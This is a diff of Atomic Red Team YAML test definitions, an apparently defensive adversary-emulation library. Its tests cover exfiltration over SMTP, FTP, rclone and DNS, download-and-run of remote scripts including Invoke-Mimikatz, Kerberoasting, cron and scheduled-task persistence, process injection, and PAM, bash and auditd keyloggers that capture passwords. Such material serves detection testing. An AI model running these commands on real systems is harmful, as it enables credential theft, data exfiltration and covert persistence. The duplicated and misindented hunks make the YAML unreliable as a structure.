type: path
default: C:\Windows\System32\notepad.exe
ip_address:
description: Destination IP address where the data should be sent
type: String
type: string
default: http://127.0.0.1
- name: Exfiltration Over Alternative Protocol - SMTP
auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
description: |
Exfiltration of specified file over SMTP.
Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
Exfiltration of specified file over SMTP.
Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.
supported_platforms:
- windows
executor:
command: |
Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
name: powershell
input_arguments:
input_file:
description: Path to file to exfiltrate
type: Path
type: path
default: C:\Windows\System32\notepad.exe
sender:
description: The email address of the sender
type: String
type: string
default: "test@corp.com"
receiver:
description: The email address of the receiver
type: String
type: string
default: "test@corp.com"
smtp_server:
description: SMTP server to use for email transportation
type: String
type: string
default: "127.0.0.1"
- name: MAZE FTP Upload
auto_generated_guid: 57799bc2-ad1e-4130-a793-fb0c385130ba
@@ -127,15 +127,15 @@ atomic_tests:
input_arguments:
ftp_server:
description: FTP Server address
type: String
type: string
default: 127.0.0.1
username:
description: Username for FTP server login
type: String
type: string
default:
password:
description: Password for FTP server login
type: String
type: string
default:
executor:
command: |
@@ -151,13 +151,13 @@ atomic_tests:
else
{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
cleanup_command: |
$ftp = "ftp://#{ftp_server}/"
try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
{$uri = New-Object System.Uri($ftp+$file.name)
$ftp_del = [System.Net.FtpWebRequest]::create($uri)
$ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')
$ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
$ftp_del.GetResponse()}} catch{}
$ftp = "ftp://#{ftp_server}/"
try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
{$uri = New-Object System.Uri($ftp+$file.name)
$ftp_del = [System.Net.FtpWebRequest]::create($uri)
$ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')
$ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
$ftp_del.GetResponse()}} catch{}
name: powershell
- name: Exfiltration Over Alternative Protocol - FTP - Rclone
auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b
@@ -189,10 +189,10 @@ atomic_tests:
Check if the exfil package exists
prereq_command: |
if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
get_prereq_command: |
get_prereq_command: |
fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
- description: 'Check if rclone zip exists'
prereq_command: |
prereq_command: |
if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
atomics/T1048/T1048.yaml
+11 -11
View File
@@ -15,7 +15,7 @@ atomic_tests:
input_arguments:
domain:
description: target SSH domain
type: Url
type: url
default: target.example.com
executor:
command: |
@@ -35,15 +35,15 @@ atomic_tests:
input_arguments:
user_name:
description: username for domain
type: String
type: string
default: atomic
password:
description: password for user
type: String
type: string
default: atomic
domain:
description: target SSH domain
type: Url
type: url
default: target.example.com
executor:
command: |
@@ -60,28 +60,28 @@ atomic_tests:
input_arguments:
password:
description: Password used to encrypt the data to be exfiltrated
type: String
type: string
default: atomic
domain:
description: The domain name to use for DNS requests
type: String
type: string
default: target.example.com
ps_module:
description: DNSExfiltrator powershell ps_module
type: Path
type: path
default: '$env:Temp\dnsexfil.ps1'
doh:
description: Google or CloudFlare DoH (DNS over HTTP) server
type: String
type: string
default: google
time:
description: The time in milliseconds to wait between each DNS request
type: String
type: string
default: 500
encoding:
description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers.
type: String
default: null
type: string
default:
dependency_executor_name: powershell
dependencies:
- description: |
atomics/T1049/T1049.yaml
+14 -14
View File
@@ -57,34 +57,34 @@ atomic_tests:
sharpview.exe located in the bin folder, an opensource red-team tool.
Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
supported_platforms:
- windows
- windows
input_arguments:
SharpView_url:
description: sharpview download URL
type: Url
type: url
default: https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true
SharpView:
description: Path of the executable opensource redteam tool used for the performing this atomic.
type: Path
type: path
default: PathToAtomicsFolder\T1049\bin\SharpView.exe
syntax:
description: Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc.
type: String
default: |
description: Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc.
type: string
default: |
"Invoke-ACLScanner", "Invoke-Kerberoast", "Find-DomainShare"
dependency_executor_name: powershell
dependencies:
- description: |
Sharpview.exe must exist on disk at specified location (#{SharpView})
prereq_command: |
if (Test-Path #{SharpView}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null
Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"
- description: |
Sharpview.exe must exist on disk at specified location (#{SharpView})
prereq_command: |
if (Test-Path #{SharpView}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null
Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"
executor:
name: powershell
elevation_required: true
command: |
command: |
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
atomics/T1053.002/T1053.002.yaml
+18 -19
View File
@@ -1,4 +1,3 @@
---
attack_technique: T1053.002
display_name: 'Scheduled Task/Job: At'
@@ -11,7 +10,7 @@ atomic_tests:
Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time.
supported_platforms:
- windows
- windows
executor:
name: command_prompt
elevation_required: false
@@ -23,35 +22,35 @@ atomic_tests:
This test submits a command to be run in the future by the `at` daemon.
supported_platforms:
- linux
- linux
input_arguments:
time_spec:
description: Time specification of when the command should run
type: String
type: string
default: now + 1 minute
at_command:
description: The command to be run
type: String
type: string
default: echo Hello from Atomic Red Team
dependency_executor_name: sh
dependencies:
- description: |
The `at` and `atd` executables must exist in the PATH
prereq_command: |
which at && which atd
get_prereq_command: |
echo 'Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'
- description: |
The `atd` daemon must be running
prereq_command: |
systemctl status atd || service atd status
get_prereq_command: |
echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'
- description: |
The `at` and `atd` executables must exist in the PATH
prereq_command: |
which at && which atd
get_prereq_command: |
echo 'Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'
- description: |
The `atd` daemon must be running
prereq_command: |
systemctl status atd || service atd status
get_prereq_command: |
echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'
executor:
name: sh
elevation_required: false
command: |
echo "#{at_command}" | at #{time_spec}
command: |-
echo "#{at_command}" | at #{time_spec}
atomics/T1053.003/T1053.003.yaml
+11 -12
View File
@@ -1,4 +1,3 @@
---
attack_technique: T1053.003
display_name: 'Scheduled Task/Job: Cron'
atomic_tests:
@@ -7,16 +6,16 @@ atomic_tests:
description: |
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
supported_platforms:
- macos
- linux
- macos
- linux
input_arguments:
command:
description: Command to execute
type: String
type: string
default: /tmp/evil.sh
tmp_cron:
description: Temporary reference file to hold evil cron schedule
type: Path
type: path
default: /tmp/persistevil
executor:
name: bash
@@ -30,16 +29,16 @@ atomic_tests:
description: |
This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
supported_platforms:
- macos
- linux
- macos
- linux
input_arguments:
command:
description: Command to execute
type: String
type: string
default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in cron folder
type: String
type: string
default: persistevil
executor:
elevation_required: true
@@ -59,15 +58,15 @@ atomic_tests:
description: |
This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
supported_platforms:
- linux
- linux
input_arguments:
command:
description: Command to execute
type: String
type: string
default: echo 'Hello from Atomic Red Team' > /tmp/atomic.log
cron_script_name:
description: Name of file to store in /var/spool/cron/crontabs folder
type: String
type: string
default: persistevil
executor:
elevation_required: true
atomics/T1053.005/T1053.005.yaml
+35 -37
View File
@@ -1,4 +1,3 @@
---
attack_technique: T1053.005
display_name: 'Scheduled Task/Job: Scheduled Task'
atomic_tests:
@@ -23,15 +22,15 @@ atomic_tests:
description: |
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.
supported_platforms:
- windows
- windows
input_arguments:
task_command:
description: What you want to execute
type: String
type: string
default: C:\windows\system32\cmd.exe
time:
description: What time 24 Hour
type: String
type: string
default: "20:10"
executor:
name: command_prompt
@@ -43,31 +42,30 @@ atomic_tests:
- name: Scheduled task Remote
auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
description: |
Create a task on a remote system.
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
Create a task on a remote system.
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
supported_platforms:
- windows
- windows
input_arguments:
task_command:
description: What you want to execute
type: String
type: string
default: C:\windows\system32\cmd.exe
time:
description: What time 24 Hour
type: String
type: string
default: "20:10"
target:
description: Target
type: String
type: string
default: localhost
user_name:
description: 'Username to authenticate with, format: DOMAIN\User'
type: String
type: string
default: DOMAIN\user
password:
description: Password to authenticate with
type: String
type: string
default: At0micStrong
executor:
name: command_prompt
@@ -83,7 +81,7 @@ atomic_tests:
Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.
supported_platforms:
- windows
- windows
executor:
name: powershell
elevation_required: false
@@ -106,7 +104,7 @@ atomic_tests:
input_arguments:
ms_product:
description: Maldoc application Word
type: String
type: string
default: Word
dependency_executor_name: powershell
dependencies:
@@ -127,28 +125,28 @@ atomic_tests:
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
name: powershell
cleanup_command : |
cleanup_command: |
Unregister-ScheduledTask -TaskName "Run Notepad" -Confirm:$false
- name: WMI Invoke-CimMethod Scheduled Task
auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
description: |
Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes.
supported_platforms:
- windows
- windows
input_arguments:
xml_path:
description: path of vbs to use when creating masquerading files
type: Path
type: path
default: PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml
dependency_executor_name: powershell
dependencies:
- description: |
File to copy must exist on disk at specified location (#{xml_path})
prereq_command: |
if (Test-Path #{xml_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml" -OutFile "#{xml_path}"
- description: |
File to copy must exist on disk at specified location (#{xml_path})
prereq_command: |
if (Test-Path #{xml_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml" -OutFile "#{xml_path}"
executor:
name: powershell
elevation_required: true
@@ -163,7 +161,7 @@ atomic_tests:
A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created.
The scheduled task will launch powershell to decode and run the command in the registry daily.
This is a persistence mechanism recently seen in use by Qakbot.
[Additiona Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)
supported_platforms:
- windows
@@ -180,27 +178,27 @@ atomic_tests:
schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
name: command_prompt
- name: Import XML Schedule Task with Hidden Attribute
- name: Import XML Schedule Task with Hidden Attribute
auto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4
description: |
Create an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute.
This technique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2.
supported_platforms:
- windows
- windows
input_arguments:
xml_path:
description: path of vbs to use when creating masquerading files
type: Path
type: path
default: PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml
dependency_executor_name: powershell
dependencies:
- description: |
File to copy must exist on disk at specified location (#{xml_path})
prereq_command: |
if (Test-Path #{xml_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml" -OutFile "#{xml_path}"
- description: |
File to copy must exist on disk at specified location (#{xml_path})
prereq_command: |
if (Test-Path #{xml_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml" -OutFile "#{xml_path}"
executor:
name: powershell
elevation_required: true
@@ -217,7 +215,7 @@ atomic_tests:
Upon successful execution, powershell.exe will create a scheduled task and modify the action.
supported_platforms:
- windows
- windows
executor:
name: powershell
elevation_required: false
atomics/T1053.006/T1053.006.yaml
+9 -9
View File
@@ -7,23 +7,23 @@ atomic_tests:
description: |
This test creates Systemd service and timer then starts and enables the Systemd timer
supported_platforms:
- linux
- linux
input_arguments:
path_to_systemd_service:
description: Path to systemd service unit file
type: Path
type: path
default: /etc/systemd/system/art-timer.service
path_to_systemd_timer:
description: Path to service timer file
type: Path
type: path
default: /etc/systemd/system/art-timer.timer
systemd_service_name:
description: Name of systemd service
type: String
type: string
default: art-timer.service
systemd_timer_name:
description: Name of systemd service timer
type: String
type: string
default: art-timer.timer
executor:
command: |
@@ -58,7 +58,7 @@ atomic_tests:
description: |
Schedule a user level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command.
supported_platforms:
- linux
- linux
dependency_executor_name: sh
dependencies:
- description: |
@@ -68,7 +68,7 @@ atomic_tests:
get_prereq_command: |
echo "Install systemd on the machine."; exit 1;
executor:
elevation_required: false
elevation_required: false
command: |
systemd-run --user --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log'
cleanup_command: |
@@ -82,7 +82,7 @@ atomic_tests:
description: |
Schedule a system level transient task (will not survive a reboot) without having to create the .timer or .service files by using the systemd-run command.
supported_platforms:
- linux
- linux
dependency_executor_name: sh
dependencies:
- description: |
@@ -92,7 +92,7 @@ atomic_tests:
get_prereq_command: |
echo "Install systemd on the machine."; exit 1;
executor:
elevation_required: true
elevation_required: true
command: |
systemd-run --unit=Atomic-Red-Team --on-calendar '*:0/1' /bin/sh -c 'echo "$(date) $(whoami)" >>/tmp/log'
cleanup_command: |
atomics/T1053.007/T1053.007.yaml
+2 -2
View File
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
namespace:
description: K8s namespace to list
type: String
type: string
default: default
dependencies:
- description: |
@@ -33,7 +33,7 @@ atomic_tests:
input_arguments:
namespace:
description: K8s namespace to list
type: String
type: string
default: default
dependencies:
- description: |
atomics/T1055.001/T1055.001.yaml
+2 -2
View File
@@ -13,11 +13,11 @@ atomic_tests:
input_arguments:
process_id:
description: PID of input_arguments
type: Integer
type: integer
default: (Start-Process notepad -PassThru).id
dll_payload:
description: DLL to Inject
type: Path
type: path
default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll
dependency_executor_name: powershell
dependencies:
atomics/T1055.004/T1055.004.yaml
+3 -4
View File
@@ -18,10 +18,10 @@ atomic_tests:
input_arguments:
exe_binary:
description: Output Binary
type: Path
type: path
default: PathToAtomicsFolder\T1055.004\bin\T1055.exe
dependency_executor_name: powershell
dependencies:
dependency_executor_name: powershell
dependencies:
- description: |
#{exe_binary} must be exist on system.
prereq_command: |
@@ -33,4 +33,3 @@ atomic_tests:
command: |
#{exe_binary}
name: command_prompt
atomics/T1055.012/T1055.012.yaml
+5 -5
View File
@@ -11,19 +11,19 @@ atomic_tests:
input_arguments:
hollow_binary_path:
description: Path of the binary to hollow (executable that will run inside the sponsor)
type: String
type: string
default: C:\Windows\System32\cmd.exe
parent_process_name:
description: Name of the parent process
type: String
type: string
default: explorer
sponsor_binary_path:
description: Path of the sponsor binary (executable that will host the binary)
type: String
type: string
default: C:\Windows\System32\notepad.exe
spawnto_process_name:
description: Name of the process to spawn
type: String
type: string
default: notepad
executor:
command: |
@@ -42,7 +42,7 @@ atomic_tests:
input_arguments:
ms_product:
description: Maldoc application Word
type: String
type: string
default: Word
dependency_executor_name: powershell
dependencies:
atomics/T1055/T1055.yaml
+5 -5
View File
@@ -14,7 +14,7 @@ atomic_tests:
input_arguments:
txt_path:
description: Path to file containing VBA macro to run
type: Path
type: path
default: PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt
dependency_executor_name: powershell
dependencies:
@@ -55,15 +55,15 @@ atomic_tests:
input_arguments:
machine:
description: machine to target (via psexec)
type: String
type: string
default: DC1
mimikatz_path:
description: Mimikatz windows executable
type: Path
type: path
default: '%tmp%\mimikatz\x64\mimikatz.exe'
psexec_path:
description: Path to PsExec
type: String
type: string
default: C:\PSTools\PsExec.exe
dependency_executor_name: powershell
dependencies:
@@ -97,7 +97,7 @@ atomic_tests:
elevation_required: false # locally not, but remotely on target machine then yes
- name: Section View Injection
auto_generated_guid: c6952f41-6cf0-450a-b352-2ca8dae7c178
description: |
description: |
This test creates a section object in the local process followed by a local section view.
The shellcode is copied into the local section view and a remote section view is created in the target process, pointing to the local section view.
A thread is then created in the target process, using the remote section view as start address.
atomics/T1056.001/T1056.001.yaml
+70 -71
View File
@@ -14,7 +14,7 @@ atomic_tests:
input_arguments:
filepath:
description: Name of the local file, include path.
type: Path
type: path
default: $env:TEMP\key.log
dependencies:
- description: |
@@ -36,7 +36,7 @@ atomic_tests:
Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges.
Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command).
Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library.
dependencies:
- description: |
@@ -48,13 +48,12 @@ atomic_tests:
supported_platforms:
- linux
executor:
command:
if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi;
if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi;
sudo touch /tmp/password-auth.bk
sudo touch /tmp/system-auth.bk
sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/password-auth
sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/system-auth
command: if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth
/tmp/password-auth.bk; fi; if sudo test -f /etc/pam.d/system-auth; then sudo
cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; sudo touch /tmp/password-auth.bk
sudo touch /tmp/system-auth.bk sudo echo "session required pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/password-auth sudo echo "session required pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/system-auth
cleanup_command: |
sudo cp -f /tmp/password-auth.bk /etc/pam.d/password-auth
sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth
@@ -67,25 +66,25 @@ atomic_tests:
To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires to be run in a bash shell and that logger and tee are installed.
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
get_prereq_command: |
echo ""
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires to be run in a bash shell and that logger and tee are installed.
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
get_prereq_command: |
echo ""
executor:
name: sh
elevation_required: true
command: |
command: |
PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
tail /var/log/syslog
cleanup_command: |
cleanup_command: |
unset PROMPT_COMMAND
- name: Bash session based keylogger
auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
@@ -94,54 +93,54 @@ atomic_tests:
To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires to be run in a bash shell
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
get_prereq_command: |
echo ""
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires to be run in a bash shell
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
get_prereq_command: |
echo ""
input_arguments:
output_file:
name: output_file
description: File to store captured commands
type: String
type: string
default: /tmp/.keyboard.log
executor:
name: sh
elevation_required: false
command: |
elevation_required: false
command: |
trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
echo "Hello World!"
cat #{output_file}
cleanup_command: |
cleanup_command: |
rm #{output_file}
- name: SSHD PAM keylogger
auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca
description: |
Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes.
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires sshd and auditd
prereq_command: |
if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
get_prereq_command: |
echo ""
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires sshd and auditd
prereq_command: |
if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
get_prereq_command: |
echo ""
input_arguments:
user_account:
description: Basic ssh user account for testing.
type: String
type: string
default: ubuntu
executor:
name: sh
elevation_required: true
command: |
elevation_required: true
command: |
cp -v /etc/pam.d/sshd /tmp/
echo "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" >> /etc/pam.d/sshd
systemctl restart sshd
@@ -152,30 +151,30 @@ atomic_tests:
whoami
exit
exit
cleanup_command: |
cleanup_command: |
cp -fv /tmp/sshd /etc/pam.d/
- name: Auditd keylogger
auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af
description: |
The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log.
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires sshd and auditd
prereq_command: |
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
get_prereq_command: |
echo ""
- linux
dependency_executor_name: sh
dependencies:
- description: |
This test requires sshd and auditd
prereq_command: |
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
get_prereq_command: |
echo ""
executor:
name: sh
elevation_required: true
command: |
elevation_required: true
command: |
auditctl -a always,exit -F arch=b64 -S execve -k CMDS
auditctl -a always,exit -F arch=b32 -S execve -k CMDS
whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S")
cleanup_command: |
cleanup_command: |
systemctl restart auditd
- name: MacOS Swift Keylogger
auto_generated_guid: aee3a097-4c5c-4fff-bbd3-0a705867ae29
@@ -184,20 +183,20 @@ atomic_tests:
Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring.
Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74
supported_platforms:
- macos
- macos
input_arguments:
swift_src:
description: Location of swift script
type: Path
default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift
description: Location of swift script
type: path
default: PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift
dependency_executor_name: bash
dependencies:
- description: |
swift script must exist at #{swift_src}, and the terminal must have input monitoring permissions.
prereq_command: |
if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi
get_prereq_command: |
echo ""
- description: |
swift script must exist at #{swift_src}, and the terminal must have input monitoring permissions.
prereq_command: |
if [ -f #{swift_src} ]; then chmod +x #{swift_src}; else exit 1; fi
get_prereq_command: |
echo ""
executor:
command: |
swift #{swift_src} -keylog
atomics/T1056.004/T1056.004.yaml
+2 -2
View File
@@ -10,11 +10,11 @@ atomic_tests:
input_arguments:
file_name:
description: Dll To Inject
type: Path
type: path
default: PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll
server_name:
description: TLS Server To Test Get Request
type: Url
type: url
default: https://www.example.com
dependency_executor_name: powershell
dependencies:
atomics/T1057/T1057.yaml
+1 -1
View File
@@ -69,4 +69,4 @@ atomic_tests:
executor:
command: |
wmic process get /format:list
name: command_prompt
name: command_prompt
atomics/T1059.001/T1059.001.yaml
+23 -24
View File
@@ -10,7 +10,7 @@ atomic_tests:
input_arguments:
mimurl:
description: Mimikatz url
type: Url
type: url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
executor:
command: |
@@ -28,7 +28,7 @@ atomic_tests:
input_arguments:
file_path:
description: File path for SharpHound payload
type: String
type: string
default: PathToAtomicsFolder\T1059.001\src
dependency_executor_name: powershell
dependencies:
@@ -110,7 +110,7 @@ atomic_tests:
input_arguments:
url:
description: url of payload to execute
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1
executor:
command: |
@@ -127,7 +127,7 @@ atomic_tests:
input_arguments:
url:
description: url of payload to execute
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml
executor:
command: |
@@ -144,7 +144,7 @@ atomic_tests:
input_arguments:
url:
description: url of payload to execute
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct
executor:
command: |
@@ -206,7 +206,7 @@ atomic_tests:
input_arguments:
ads_file:
description: File created to store Alternate Stream Data
type: String
type: string
default: $env:TEMP\NTFS_ADS.txt
dependencies:
- description: |
@@ -229,19 +229,19 @@ atomic_tests:
description: |
Connect to a remote powershell session and interact with the host.
Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.
supported_platforms:
- windows
- windows
input_arguments:
hostname_to_connect:
description: The host to connect to, by default it will connect to the local machine
type: String
type: string
default: $env:COMPUTERNAME
dependencies:
- description: |
PSRemoting must be enabled
PSRemoting must be enabled
prereq_command: |
Try {
New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null
@@ -271,11 +271,11 @@ atomic_tests:
input_arguments:
command_line_switch_type:
description: The type of supported command-line switch to use
type: String
type: string
default: Hyphen
command_param_variation:
description: The "Command" parameter variation to use
type: String
type: string
default: C
dependencies:
- description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter must be exported in the module.
@@ -297,15 +297,15 @@ atomic_tests:
input_arguments:
command_line_switch_type:
description: The type of supported command-line switch to use
type: String
type: string
default: Hyphen
command_param_variation:
